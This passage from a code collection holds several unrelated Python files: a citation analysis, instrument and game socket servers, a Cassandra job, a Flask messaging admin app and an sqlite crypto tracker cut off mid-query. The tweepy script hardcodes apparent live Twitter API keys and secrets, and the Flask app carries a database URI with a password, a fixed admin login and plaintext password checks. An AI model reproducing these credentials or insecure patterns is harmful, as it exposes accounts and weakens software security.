\"../dataset/COVID19_papers_modeling_with_features.csv\"\n covid19_paper_df = pd.read_csv(covid19_papers_modeling_filename)\n \n # flu\n flu_papers_modeling_filename = \"../dataset/FLU_papers_modeling_with_features.csv\"\n flu_paper_df = pd.read_csv(flu_papers_modeling_filename)\n\n print(\"Cleaning data...\")\n # COVID19\n citation_count_replaced = covid19_paper_df['citation_count'].replace(-1,np.nan)\n covid19_paper_df = covid19_paper_df.assign(citation_count = citation_count_replaced)\n\n # replace average topic distr similarity -1 as nan\n # value of -1 means zero or one authors have abstracts available\n avg_tdsim_replaced = covid19_paper_df['avg_tdsim'].replace(-1, np.nan)\n covid19_paper_df = covid19_paper_df.assign(avg_tdsim = avg_tdsim_replaced)\n\n # flu paper\n cultural_sim_replaced = flu_paper_df['cultural_similarity'].replace(-1,np.nan)\n flu_paper_df = flu_paper_df.assign(cultural_similarity = cultural_sim_replaced)\n\n print(\"Log transforming...\")\n # COVID19\n team_size_log_transformed = np.log(covid19_paper_df['team_size']+1)\n max_hindex_log_transformed = np.log(covid19_paper_df['max_hindex']+1)\n citation_count_log_transformed = np.log(covid19_paper_df['citation_count']+1)\n citation_per_month_log_transformed = 
np.log(covid19_paper_df['citation_per_month']+1)\n\n covid19_paper_df = covid19_paper_df.assign(team_size_log = team_size_log_transformed)\n covid19_paper_df = covid19_paper_df.assign(max_hindex_log = max_hindex_log_transformed)\n covid19_paper_df = covid19_paper_df.assign(citation_count_log = citation_count_log_transformed)\n covid19_paper_df = covid19_paper_df.assign(citation_per_month_log = citation_per_month_log_transformed)\n\n # flu\n team_size_log_transformed = np.log(flu_paper_df['team_size']+1)\n max_hindex_log_transformed = np.log(flu_paper_df['max_hindex']+1)\n citation_count_log_transformed = np.log(flu_paper_df['citation_count']+1)\n citation_per_month_log_transformed = np.log(flu_paper_df['citation_per_month']+1)\n\n flu_paper_df = flu_paper_df.assign(team_size_log = team_size_log_transformed)\n flu_paper_df = flu_paper_df.assign(max_hindex_log = max_hindex_log_transformed)\n flu_paper_df = flu_paper_df.assign(citation_count_log = citation_count_log_transformed)\n flu_paper_df = flu_paper_df.assign(citation_per_month_log = citation_per_month_log_transformed)\n\n # get dummy variables for publish month\n publish_month_dummy = pd.get_dummies(covid19_paper_df.publish_month_text)\n publish_month_dummy.columns = [\"publish_{}\".format(c) for c in publish_month_dummy.columns]\n covid19_paper_df = covid19_paper_df.assign(**publish_month_dummy)\n publish_month_columns = list(publish_month_dummy.columns)\n publish_month_columns.remove(\"publish_Aug\")\n publish_month_columns.remove(\"publish_Sep\")\n\n publish_month_dummy = pd.get_dummies(flu_paper_df.publish_month_text)\n publish_month_dummy.columns = [\"publish_{}\".format(c) for c in publish_month_dummy.columns]\n flu_paper_df = flu_paper_df.assign(**publish_month_dummy)\n publish_month_columns = list(publish_month_dummy.columns)\n publish_month_columns.remove(\"publish_Sep\")\n publish_month_columns.remove(\"publish_Aug\")\n\n # define variables\n control_var = [\"avg_tdsim\", \"new_tie_rate\", \"hindex_gini\",\"cultural_similarity\", \"topic_familiarity_var\", \"max_hindex_log\", \"team_size_log\", \"prac_affil_rate\"] + publish_month_columns + [\"topic_distr{}\".format(i) for i in range(1,20)]\n predictor_var = \"topic_familiarity\"\n\n # drop NA rows\n # COVID19\n covid19_paper_df = covid19_paper_df.dropna(subset=[predictor_var] + control_var + [\"citation_per_month\", \"citation_per_month_binary_10perc\", \"citation_per_month_binary_5perc\", \"citation_per_month_binary_1perc\"])\n print(\"Number of COVID papers: {}\".format(covid19_paper_df.shape[0]))\n\n # flu\n flu_paper_df = flu_paper_df.dropna(subset=[predictor_var] + control_var + [\"citation_per_month\", \"citation_per_month_binary_10perc\", \"citation_per_month_binary_5perc\", \"citation_per_month_binary_1perc\"])\n print(\"Number of flu papers: {}\".format(flu_paper_df.shape[0]))\n\n print(\"Creating matching variable...\")\n # match on journals\n covid19_journals = covid19_paper_df.journal.str.lower().str.strip()\n covid19_paper_df = covid19_paper_df.assign(journal = covid19_journals)\n\n flu_journals = flu_paper_df.publication_name.str.lower().str.strip()\n flu_paper_df = flu_paper_df.assign(journal = flu_journals)\n\n random.seed(100)\n\n matched_flu_scopusid = []\n matched_covid19_uid = []\n for idx, flu_paper in flu_paper_df.iterrows():\n flu_journal = flu_paper.journal\n matched_covid19_paper = covid19_paper_df[covid19_paper_df.journal == flu_journal]\n if matched_covid19_paper.shape[0] != 0:\n new_matched_covid19_paper = [p for p in 
matched_covid19_paper.cord_uid.values if p not in matched_covid19_uid]\n if len(new_matched_covid19_paper) != 0:\n sampled_covid19_match = random.choice(new_matched_covid19_paper)\n\n matched_flu_paper = flu_paper_df.iloc[idx].scopus_id\n matched_flu_scopusid.append(matched_flu_paper)\n matched_covid19_uid.append(sampled_covid19_match)\n\n print(\"Generating covid indicator variable...\")\n covid19_matched = covid19_paper_df[covid19_paper_df.cord_uid.isin(matched_covid19_uid)]\n covid19_matched.reset_index(drop=True, inplace=True)\n covid19_matched = covid19_matched.assign(covid19=int(1))\n\n flu_matched = flu_paper_df[flu_paper_df.scopus_id.isin(matched_flu_scopusid)]\n flu_matched.reset_index(drop=True, inplace=True)\n flu_matched = flu_matched.assign(covid19=int(0))\n\n # Combine covid and flu papers\n covid19_matched = covid19_matched[[predictor_var] + control_var + [\"covid19\", \"citation_per_month_log\", \"citation_per_month_binary_20perc\", \"citation_per_month_binary_10perc\", \"citation_per_month_binary_5perc\"]]\n flu_matched = flu_matched[[predictor_var] + control_var + [\"covid19\", \"citation_per_month_log\", \"citation_per_month_binary_20perc\", \"citation_per_month_binary_10perc\", \"citation_per_month_binary_5perc\"]]\n combined_papers = pd.concat([covid19_matched, flu_matched])\n print(\"Number of matched samples: {}\".format(combined_papers.shape[0]))\n\n # Standardize\n standardize_columns = [predictor_var] + [\"avg_tdsim\", \"new_tie_rate\", \"hindex_gini\",\"cultural_similarity\", \"topic_familiarity_var\", \"max_hindex_log\", \"team_size_log\", \"prac_affil_rate\"] + [\"topic_distr{}\".format(i) for i in range(1,20)]\n X = np.array(combined_papers[standardize_columns])\n X_scaled = scale(X)\n\n combined_papers_scaled = combined_papers.copy()\n combined_papers_scaled[standardize_columns] = X_scaled\n\n ## Effect of topic familiarity\n binary_citation_20perc_tf_model = cem_test(0.2, \"topic_familiarity\", combined_papers_scaled, [predictor_var] + control_var)\n binary_citation_10perc_tf_model = cem_test(0.1, \"topic_familiarity\", combined_papers_scaled, [predictor_var] + control_var)\n binary_citation_5perc_tf_model = cem_test(0.05, \"topic_familiarity\", combined_papers_scaled, [predictor_var] + control_var)\n \n # export data for plotting.\n combined_papers_scaled.to_csv(\"../results/updated_results/cem_test_interaction_journal_data_exported.csv\", index=False)\n\n","sub_path":"src/cem_test_binary_citation_journal.py","file_name":"cem_test_binary_citation_journal.py","file_ext":"py","file_size_in_byte":9149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"27537094","text":"# Python SCPI socket functions\r\n\r\n\r\n\r\nimport socket\r\n\r\ndef SCPI_sock_connect(ipaddress,port=57732):\r\n \"\"\" Opens up a socket connection between an instrument and your PC\r\n Returns the socket session\r\n\r\n Arguments:\r\n ipaddress -> ip address of the instrument\r\n port -> optional -> socket port of the instrument (default 5025)\"\"\"\r\n\r\n try:\r\n session=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n session.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 0)\r\n session.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, 0)\r\n session.connect((ipaddress,port))\r\n except IOError:\r\n\t print (\"Failed to connect to the instrument, pleace check your IP address\")\r\n\t#return\r\n return session\r\n\r\ndef SCPI_sock_send(session,command,error_check=False):\r\n \"\"\"Sends a command to an instrument\r\n\r\n 
Arguments:\r\n session -> TCPIP socket connection\r\n command -> text containing an instrument command\r\n error_check -> optional -> Check for instrument errors (default False)\"\"\"\r\n \r\n resp = \" \"\r\n message=command + \"\\r\\n\"\r\n message=message.encode('ascii', 'ignore')\r\n session.sendall(message)\r\n\r\n if error_check==True:\r\n err = get_error(session, command) \r\n \r\n#def SCPI_sock_query(session,command,error_check=False):\r\n# \"\"\"Sends a query to an instrument\r\n# Returns the query response\r\n# \r\n# Arguments:\r\n# session -> TCPIP socket connection\r\n# command -> text containing an instrument command\r\n# error_check -> optional -> Check for instrument errors (default False)\"\"\"\r\n# \r\n# session.settimeout(2.0)\r\n# try:\r\n# session.sendall(command + \"\\n\")\r\n# response = getDataFromSocket(session)\r\n# if error_check==True:\r\n# err = get_error(session, command)\r\n# if err:\r\n# response = \"\"\r\n# return response\r\n# \r\n# except socket.timeout:\r\n# print \"Query error:\"\r\n# get_error(session, command)\r\n# response = \"\"\r\n# return response\r\n#\r\ndef SCPI_sock_close(session):\r\n \"\"\"Closes the socket connection\r\n\r\n Argument:\r\n session -> TCPIP socket connection\"\"\"\r\n \r\n session.close()\r\n#\r\ndef getDataFromSocket(session):\r\n \"\"\"Reads from a socket until a newline is read\r\n Returns the data read\r\n\r\n Argument:\r\n session -> TCPIP socket\"\"\"\r\n \r\n dat = \"\"\r\n while 1:\r\n message = session.recv(4096)\r\n last=len(message)\r\n if message[last-1] == \"\\n\":\r\n dat=dat+message[:-1]\r\n return dat\r\n else:\r\n dat=dat+message\r\n#\r\n#def get_error(session, command):\r\n# \"\"\"Checks an instrument for errors and print them out\r\n# Returns True if any errors are encountered\r\n#\r\n# Arguments:\r\n# session -> TCPIP socket connection\r\n# command -> text containing an instrument command\"\"\"\r\n# \r\n# has_err=False\r\n# resp = SCPI_sock_query(session,\"SYST:ERR?\")\r\n# \r\n# if int(resp[:2]) != 0:\r\n# print \"Your command: \" + command + \" has errors:\"\r\n# print resp\r\n# has_err = True\r\n# while int(resp[:2]) != 0:\r\n# resp=SCPI_sock_query(session,\"SYST:ERR?\")\r\n# if int(resp[:2]) != 0:\r\n# print resp\r\n#\r\n# return has_err\r\n","sub_path":"SCPI_socket.py","file_name":"SCPI_socket.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"645013285","text":"# -*- coding: utf-8 -*-\n\n\n\"\"\"Serveur de jeu temps réel Pooo\n \n\"\"\"\n\nimport socketserver\nimport socket\nimport threading\nimport logging\nimport re\n\nROOM_SIZE=4\n\nfrom pooogame import Room, Contest, Player\n\n\nBUFSIZE=2048\n\nHOST, PORT = \"localhost\", 9876\n\n\n#LOG_FILENAME=\n#LEVELS = { 'debug':logging.DEBUG,\n# 'info':logging.INFO,\n# 'warning':logging.WARNING,\n# 'error':logging.ERROR,\n# 'critical':logging.CRITICAL,\n# }\nlogging.basicConfig(level=logging.DEBUG)\n\n\n\nclass PoooHandler(socketserver.BaseRequestHandler):\n \"\"\"callback du serveur lorsqu'il enregistre une nouvelle connexion (un nouveau client) \n \n \"\"\"\n \n def handle(self):\n self.request.set_inheritable(True) # tricks pour la version python 3.4 (3 jours de debug...)\n # register new player\n p=Player(self.request, self.client_address, self.server.engage)\n p.start()\n self.server.join(p) \n return\n \n \n\nclass PoooServer(socketserver.ThreadingMixIn, socketserver.TCPServer):\n engage=threading.Event() # set when a contest is created from current room 
(then reseted)\n contests=[]\n room=None\n \n @property\n def load(self):\n return len(self.contests)\n \n def join(self, player):\n room.join(player)\n\n\ndef fucking_failing_main():\n server = PoooServer((HOST, PORT), PoooHandler)\n room=Room(server)\n room.start()\n \n # Démarre un thread pour le serveur -- chaque nouvelle connexion entrante\n # démarre un nouveau thread également\n server_thread = threading.Thread(name='Pooo server', target=server.serve_forever)\n server_thread.daemon = True\n server_thread.start()\n logging.info(\"{} up and running at {}:{}\".format(server_thread.name, HOST, PORT))\n\n try: \n server_thread.join()\n except KeyboardInterrupt:\n logging.warning('Ctr-C Stop server\\n')\n\n\nclass Server:\n lock = threading.Lock()\n engage=threading.Event()\n contests = []\n \n @property\n def load(self):\n return len(self.contests) \n \n\ndef main(): # version avec socket bloquante, mais au moins ça fonctionne !\n server=Server()\n room = Room(server, ROOM_SIZE)\n room.start()\n\n ssock = socket.socket()\n ssock.bind(('', 9876))\n ssock.listen(ROOM_SIZE*3)\n while True:\n try: \n sock, addr = ssock.accept() \n with server.lock:\n # register new player\n sock.set_inheritable(True) # tricks pour la version python 3.4\n p=Player(sock, addr, server.engage)\n p.start()\n room.join(p) \n \n except KeyboardInterrupt:\n print('Ctrl C')\n ssock.close()\n break\n \n\nif __name__ == \"__main__\": \n main()\n","sub_path":"poooserver.py","file_name":"poooserver.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"587928258","text":"from time import sleep\nimport tweepy\nfrom tweepy import OAuthHandler\n\nckey = \"H5j0EojWWqEBWpsnnwrayYXpW\"\ncsecret = \"rVyGkfa6QNAKN80iLxBgbps7GzJRGr4jhBWUP8FBR1RMroKxgp\"\natoken = \"45212834-fCrnR0AII4yFSQ0n57HIlSIoOzH2hdT0QOcFkfiB2\"\nasecret = \"xQDG9X6DyaCBGlejGeZC9vLbF505wejN5eDR6UxhUyTjb\"\n\nauth = OAuthHandler(ckey, csecret)\nauth.set_access_token(atoken, asecret)\nauth.secure = True\napi = tweepy.API(auth)\n\n\nfor tweet in tweepy.Cursor(api.search, q=\"besiktas\", lang=\"en\").items(10):\n\n try:\n print(\"Tweet sent by: @\" + tweet.user.screen_name)\n\n except tweepy.TweepError as e:\n print(e.reason)\n sleep(10)\n continue\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"520822727","text":"from multiprocessing.pool import ThreadPool\nfrom functools import partial\nfrom collections import defaultdict\nimport time\n\nfrom transactions.new_order import populate_related_customers\nfrom transactions.utils import *\n\n\ncounter = 0\nstart_time = 0\n\n\ndef work(session, cql, bucket, order):\n global counter\n global start_time\n global interval1\n global interval2\n time1 = time.time()\n for i in bucket[(order.o_w_id, order.o_d_id, order.o_id)]:\n do_query(session, cql, (order.o_w_id, i, order.o_id, order.o_d_id, order.o_c_id), 'write')\n populate_related_customers(session, order.o_w_id, order.o_d_id, order.o_c_id, bucket[(order.o_w_id, order.o_d_id, order.o_id)])\n counter += 1\n if counter % 100 == 0:\n batch_time = time.time()\n elapsed = batch_time - start_time\n throughput = counter * 1.0 / elapsed\n print(\"number of preprocessed orders: \", counter)\n print(\"throughput: %s orders per second\" % (\"{:.2f}\".format(throughput)))\n\n\ndef preprocess_related_customer(session):\n global start_time\n bucket 
= defaultdict(list)\n time1 = time.time()\n orders = session.execute('SELECT O_W_ID, O_D_ID, O_ID, O_C_ID FROM orders')\n order_lines = session.execute('SELECT OL_W_ID, OL_D_ID, OL_O_ID, OL_I_ID FROM order_line')\n for ol in order_lines:\n bucket[(ol.ol_w_id, ol.ol_d_id, ol.ol_o_id)].append(ol.ol_i_id)\n time2 = time.time()\n print(\"Time to fetch all order lines: %s seconds\" % (\"{:.2f}\".format(time2 - time1)))\n pool = ThreadPool(16)\n start_time = time.time()\n cql = session.prepare(\"INSERT INTO item_orders (W_ID, I_ID, O_ID, D_ID, C_ID) VALUES (?, ?, ?, ?, ?)\")\n pool.map(partial(work, session, cql, bucket), orders)\n\n","sub_path":"cassandra/src/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"631060337","text":"from flask import Flask, render_template, redirect, url_for, request, flash\n\nimport os\n\nfrom root.dao.database import Database\nfrom root.dao.orm.model import *\n\nfrom root.forms.user import *\nfrom root.forms.category import *\nfrom root.forms.messenger import *\nfrom root.forms.message import *\n\n\n\napp = Flask(__name__)\n\nSECRET_KEY = os.urandom(24)\napp.config['SECRET_KEY'] = SECRET_KEY\n\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'postgres://qhsmovulrcixsq:4de2d87cc269e6e20a3b9d3a3cafd5b28eb5deb674a965ccb74db00dffc5e9f8@ec2-174-129-255-11.compute-1.amazonaws.com:5432/dd8urtd5qotins'\n\ndb = Database()\n\n\nBase.metadata.create_all(db.sqlalchemy_engine)\nsession = db.sqlalchemy_session\n\n@app.route('/', methods = ['GET', 'POST'])\ndef login():\n\n error = None\n form = LoginForm()\n\n\n if request.method == 'POST':\n user = request.form['username']\n users = list(db.sqlalchemy_session.query(Users.display_name, Users.password).filter(\n Users.display_name == user))\n\n\n if user == 'admin' and \\\n request.form['password'] == 'secret':\n return redirect(url_for('admin'))\n\n elif not users:\n error = 'Такой пользователь не существует: введите данные правильно или регистрируйтесь.'\n elif request.form['password'] != users[0][1]:\n error = 'Неправильный логин или пароль.'\n\n else:\n flash('Вы успешно ввошли!')\n return redirect(url_for('client', username=user))\n\n return render_template('login.html', error = error, form = form)\n\n@app.route('/register', methods = ['GET', 'POST'])\ndef register():\n\n error = None\n form = UserForm(request.form)\n\n\n if request.method == 'POST' and form.validate():\n\n user = list(db.sqlalchemy_session.query(Users.display_name, Users.password).filter(\n Users.display_name == request.form['username']))\n\n if user:\n\n error = 'Такой пользователь уже существует: придумайте другой username'\n else:\n\n user = Users(display_name = request.form['username'], password = request.form['password'], location = request.form['location'])\n db.createUser(user)\n flash('Спасибо за регистрацию')\n\n return redirect(url_for('login'))\n\n return render_template('userForm.html', form=form, tittle='Регистрация', error=error)\n\n\n@app.route('/', methods = ['GET', 'POST'])\ndef client(username):\n\n client_id = list(db.sqlalchemy_session.query(Users.user_id).filter(Users.display_name == username))[0][0]\n client_message = list(db.sqlalchemy_session.query(Message).filter(Message.user_fk == client_id))\n\n form = messageClientForm(request.form)\n form.messenger.choices = [(messenger.messenger_name, messenger.messenger_name) for messenger in db.sqlalchemy_session.query(Messenger).all()]\n form.category.choices = 
[(category.category_name, category.category_name) for category in db.sqlalchemy_session.query(Category).all()]\n\n if request.method == 'POST' and form.validate():\n user = list(db.sqlalchemy_session.query(Users.user_id).filter(Users.display_name==username))[0][0]\n tittle = form.tittle.data\n body = form.body.data\n messenger = list(db.sqlalchemy_session.query(Messenger.messenger_id).filter(Messenger.messenger_name==request.form['messenger']))[0][0]\n category = list(db.sqlalchemy_session.query(Category.category_id).filter(Category.category_name==request.form['category']))[0][0]\n\n message = Message(user_fk=user, tittle=tittle, body=body, messenger_fk=messenger, category_fk=category)\n db.createMessage(message)\n return redirect(url_for('client', username=username))\n\n return render_template('client.html', client=username, messages = client_message, form=form)\n\n\n\n@app.route('/admin')\ndef admin():\n return render_template('admin_base.html')\n\n\n@app.route('/admin/user')\ndef users():\n all_users = db.fetchAllUsers()\n return render_template('user.html', all_users=all_users)\n\n@app.route('/admin/user/delete_user/')\ndef delete_user(user_id):\n db.deleteUser(user_id)\n return redirect(url_for(\"users\"))\n\n@app.route('/admin/user/edit/', methods = [\"GET\", \"POST\"])\ndef update_user(user_id):\n\n error = None\n\n user_data = db.fetchUser(user_id)\n\n form = UserUpdateForm(request.form, username = user_data.display_name, location = user_data.location)\n\n if request.method == \"POST\" and form.validate():\n\n username = form.username.data\n\n same_user = list(db.sqlalchemy_session.query(Users).filter(Users.display_name == request.form['username']))\n\n if same_user and username != user_data.display_name:\n error = 'Такой пользователь уже существует'\n else:\n\n if request.form['password'] == '':\n password = user_data.password\n else:\n password = form.password.data\n\n location = form.location.data\n\n db.updateUser(user_id, display_name=username, password=password, location=location)\n\n return redirect(url_for(\"users\"))\n\n\n return render_template(\"userUpdateForm.html\", form=form, tittle = 'Изменить пользователя', error = error)\n\n@app.route('/admin/user/create_new_user', methods = [\"GET\", \"POST\"])\ndef create_user():\n\n error = None\n form = UserForm(request.form)\n\n\n if request.method == \"POST\" and form.validate():\n\n user = list(db.sqlalchemy_session.query(Users.display_name, Users.password).filter(\n Users.display_name == request.form['username']))\n\n if user:\n error = 'Такой пользователь уже существует: придумайте другой username'\n else:\n user = Users(display_name=request.form['username'], password=request.form['password'],\n location=request.form['location'])\n db.createUser(user)\n\n return redirect(url_for('users'))\n\n\n return render_template('userForm.html', form=form, tittle='Создать нового пользователя', error = error)\n\n@app.route('/admin/category')\ndef category():\n all_category = db.fetchAllCategory()\n return render_template('category.html', all_category=all_category)\n\n@app.route('/admin/category/delete_category/')\ndef delete_category(category_id):\n db.deleteCategory(category_id)\n return redirect(url_for(\"category\"))\n#\n@app.route('/admin/category/edit/', methods = [\"GET\", \"POST\"])\ndef update_category(category_id):\n\n error = None\n category_data = db.fetchCategory(category_id)\n\n\n form = CategoryForm(request.form,\\\n category_name = category_data.category_name,\n amount = category_data.population_count )\n\n if 
request.method == \"POST\" and form.validate():\n\n categories = list(db.sqlalchemy_session.query(Category.category_name).\n filter(Category.category_name == request.form['category_name']))\n\n if categories and request.form['category_name'] != category_data.category_name:\n error = 'Такая категория уже существует'\n else:\n\n category_name = form.category_name.data\n amount = form.amount.data\n db.updateCategory(category_id, category_name, amount)\n return redirect(url_for(\"category\"))\n\n return render_template(\"categoryForm.html\", form=form, tittle = 'Изменить категорию', error = error)\n\n@app.route('/admin/category/create_new_category', methods = [\"GET\", \"POST\"])\ndef create_category():\n\n error = None\n\n form = CategoryForm(request.form)\n\n if request.method == \"POST\" and form.validate():\n\n categories = list(db.sqlalchemy_session.query(Category.category_name).\n filter(Category.category_name == request.form['category_name']))\n\n if categories:\n error = 'Такая категория уже существует'\n else:\n category_name = form.category_name.data\n amount = form.amount.data\n category = Category(category_name=category_name, population_count=amount)\n db.createCategory(category)\n\n return redirect(url_for(\"category\"))\n\n return render_template(\"categoryForm.html\", form=form, tittle = 'Создать новую категорию', error = error)\n\n\n@app.route('/admin/messenger')\ndef messengers():\n all_messengers = db.fetchAllMessenger()\n return render_template('messenger.html', all_messengers=all_messengers)\n\n\n@app.route('/admin/messenger/delete_messenger/')\ndef delete_messenger(messenger_id):\n db.deleteMessenger(messenger_id)\n return redirect(url_for(\"messengers\"))\n\n@app.route('/admin/messenger/edit_messenger/', methods=['POST', 'GET'])\ndef update_messenger(messenger_id):\n error = None\n\n messenger_data = db.fetchMessenger(messenger_id)\n\n form = MessengerForm(request.form,\n messenger_name=messenger_data.messenger_name)\n\n if request.method == 'POST' and form.validate():\n\n same_messenger = list(db.sqlalchemy_session.query(Messenger).\n filter(Messenger.messenger_name == request.form['messenger_name']))\n if same_messenger and request.form['messenger_name'] != messenger_data.messenger_name:\n error = 'Такая категория уже существует'\n else:\n messenger_name = form.messenger_name.data\n\n db.updateMessenger(messenger_id, messenger_name)\n return redirect(url_for('messengers'))\n\n return render_template('messengerForm.html', form = form, tittle = 'Изменить messenger', error=error)\n\n@app.route('/admin/messenger/create_new_messenger', methods = [\"GET\", \"POST\"])\ndef create_messenger():\n\n error = None\n\n form = MessengerForm(request.form)\n\n if request.method == \"POST\" and form.validate():\n\n same_messenger = list(db.sqlalchemy_session.query(Messenger).\n filter(Messenger.messenger_name == request.form['messenger_name']))\n\n if same_messenger:\n error = 'Такая категория уже существует'\n else:\n messenger_name = form.messenger_name.data\n messenger = Messenger(messenger_name=messenger_name)\n db.createMessenger(messenger)\n\n return redirect(url_for(\"messengers\"))\n\n return render_template(\"messengerForm.html\", form=form, tittle = 'Создать новый messenger', error=error)\n\n@app.route('/admin/messages')\ndef messages():\n all_messages = db.fetchAllMessages()\n all_users = db.fetchAllUsers()\n all_messengers = db.fetchAllMessenger()\n all_categories = db.fetchAllCategory()\n\n return render_template('messages.html', all_messages=all_messages, all_users = 
all_users, all_messengers = all_messengers, all_categories\n =all_categories)\n\n@app.route('/admin/messages/delete/')\ndef delete_message(message_id):\n db.deleteMessage(message_id)\n return redirect(url_for('messages'))\n\n\n@app.route('/admin/messages/edit/', methods = ['POST', 'GET'])\ndef update_message(message_id):\n\n error = None\n\n message_data = db.fetchMessage(message_id)\n\n\n user_name = list(db.sqlalchemy_session.query(Users.display_name).filter(Users.user_id == message_data.user_fk))\n\n if user_name:\n user_name = user_name[0][0]\n else:\n user_name = ''\n\n if message_data.messenger_fk is not None:\n messenger_name = list(db.sqlalchemy_session.query(Messenger.messenger_name).filter(\n Messenger.messenger_id == message_data.messenger_fk))[0][0]\n else:\n messenger_name = None\n\n\n if message_data.category_fk is not None:\n category_name = list(db.sqlalchemy_session.query(Category.category_name).filter(\n Category.category_id == message_data.category_fk))[0][0]\n else:\n category_name = None\n\n\n form = messageUpdateForm(request.form, messenger = messenger_name, category = category_name)\n\n form.messenger.choices =[(messenger.messenger_name, messenger.messenger_name) for messenger in db.sqlalchemy_session.query(Messenger).all()]\n form.category.choices = [(category.category_name, category.category_name) for category in db.sqlalchemy_session.query(Category).all()]\n\n\n if request.method == 'POST' and form.validate():\n\n if request.form['messenger'] is None:\n messenger_id = None\n else:\n messenger_id = list(db.sqlalchemy_session.query(Messenger.messenger_id).filter(\n Messenger.messenger_name == request.form['messenger']))[0][0]\n\n categories = list(db.sqlalchemy_session.query(Category.category_id).filter(\n Category.category_name == request.form['category']))\n\n if categories:\n category_id = categories[0][0]\n else:\n category_id = None\n\n db.updateMessage_second(message_id=message_id, messenger = messenger_id, category = category_id)\n return redirect(url_for('messages'))\n\n return render_template('messageUpdateForm.html', form=form, data = message_data, user = user_name, error=error)\n\n\n\n\n@app.route('/admin/messages/create_new_message', methods = [\"GET\", \"POST\"])\ndef create_message():\n\n error = []\n\n form = messageCreateForm(request.form)\n\n form.user.choices = [(user.display_name, user.display_name)\n for user in db.sqlalchemy_session.query(Users).all()]\n form.messenger.choices = [(messenger.messenger_name, messenger.messenger_name)\n for messenger in db.sqlalchemy_session.query(Messenger).all()]\n form.category.choices = [(category.category_name, category.category_name)\n for category in db.sqlalchemy_session.query(Category).all()]\n\n if request.method == \"POST\" and form.validate():\n\n user = list(db.sqlalchemy_session.query(Users.user_id).filter(Users.display_name == request.form['user']))[0][0]\n tittle = form.tittle.data\n body = form.body.data\n messenger = list(db.sqlalchemy_session.query(Messenger.messenger_id).filter(Messenger.messenger_name == request.form['messenger']))[0][0]\n category = list(db.sqlalchemy_session.query(Category.category_id).filter(Category.category_name == request.form['category']))[0][0]\n\n message = Message(tittle=tittle, body=body, user_fk=user, messenger_fk=messenger, category_fk=category)\n db.createMessage(message)\n return redirect(url_for(\"messages\"))\n\n return render_template(\"messageForm.html\", form=form, tittle = 'Создать новое сообщение', error = error)\n\n# @app.route('/dashboard')\n# def 
dashboard():\n#     # message_data = db.fetchAllMessages()\n#     # messager_id = []\n#     # clicks = []\n#     #\n#     # for message in message_data:\n#     #     messager_id.append(message.messenger)\n#     #     clicks.append(message.count_clicks)\n#     #\n#     # bar = go.Bar(\n#     #     x = messager_id,\n#     #     y =clicks\n#     # )\n#\n#     catagory_data = db.fetchAllCatagory()\n#     catagory_name = []\n#     population = []\n#\n#     for catagory in catagory_data:\n#         catagory_name.append(catagory.catagory_name)\n#         population.append(catagory.population)\n#\n#     pie = go.Pie(\n#         labels = catagory_name,\n#         values = population\n#     )\n#\n#     attach_data = db.fetchAllAttaches()\n#     attach_name = []\n#     attach_size = []\n#\n#     for attach in attach_data:\n#         attach_name.append(attach.name)\n#         attach_size.append(attach.size)\n#\n#     bar = go.Bar(\n#         x=attach_name,\n#         y=attach_size\n#     )\n#\n#     data = {\n#         \"bar\": [bar],\n#         \"pie\": [pie]\n#     }\n#\n#\n#\n#     graphsJSON = json.dumps(data, cls=plotly.utils.PlotlyJSONEncoder)\n#     return render_template(\"dashboard.html\", graphsJSON=graphsJSON)\n\nif __name__ == '__main__':\n    app.run(debug=True)","sub_path":"root/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
+{"seq_id":"556332902","text":"import sqlite3\n\ndatabase = ('data/movements.db')\n\ndef inicialVerification():\n    # Check whether the DB is empty or already populated\n    conn = sqlite3.connect(database)\n    cursor = conn.cursor()\n\n    query = '''\n    SELECT count (*) FROM cryptos;\n    '''\n    cursor.execute(query)\n    n=cursor.fetchone()\n    conn.close()\n    if n[0]==0:\n        return False\n    else:\n        return True\n\ndef CryptosDBInformed(cryptos):\n    # Save the cryptos fetched from the API into the cryptos table\n    conn = sqlite3.connect(database)\n    cursor = conn.cursor()\n\n    query='''\n    INSERT into cryptos\n    (symbol, name)\n    values (?, ?);\n    '''\n\n    try:\n        for i in range (len(cryptos)):\n            rows=cursor.execute(query, (cryptos[i][0], cryptos[i][1]))\n    except sqlite3.Error as e:\n        print('Error en sqlite:', e)\n    \n    conn.commit()\n    conn.close()\n\ndef listCryptosIni():\n    # Return the symbol and name of the Euro currency for the first operation, since the To_Currency table is still empty\n    conn = sqlite3.connect(database)\n    cursor = conn.cursor()\n\n    query = '''\n    SELECT symbol, name\n    FROM cryptos \n    WHERE cryptos.id=13;\n    '''\n    rows=cursor.execute(query)\n    cryptosInverts=[]\n    text=''\n\n    for row in rows:\n        text= '{} - {}'.format(row[0], row[1])\n        cryptosInverts.append(text)\n\n    conn.close()\n    return cryptosInverts\n\ndef listCryptos():\n    # Return a list with the symbol and name of the cryptos stored in the DB\n    conn = sqlite3.connect(database)\n    cursor = conn.cursor()\n\n    query = '''\n    SELECT symbol, name FROM cryptos ORDER BY symbol;\n    '''\n    rows=cursor.execute(query)\n    cryptos=[]\n    text=''\n    for row in rows:\n        text= '{} - {}'.format(row[0], row[1])\n        cryptos.append(text)\n    \n    conn.close()\n    return cryptos\n\ndef listCryptosInvert():\n    # Return a list with the symbol and name of the cryptos already invested in, plus the Euros\n    conn = sqlite3.connect(database)\n    cursor = conn.cursor()\n\n    query = '''\n    SELECT DISTINCT symbol, name\n    FROM cryptos INNER JOIN movements\n    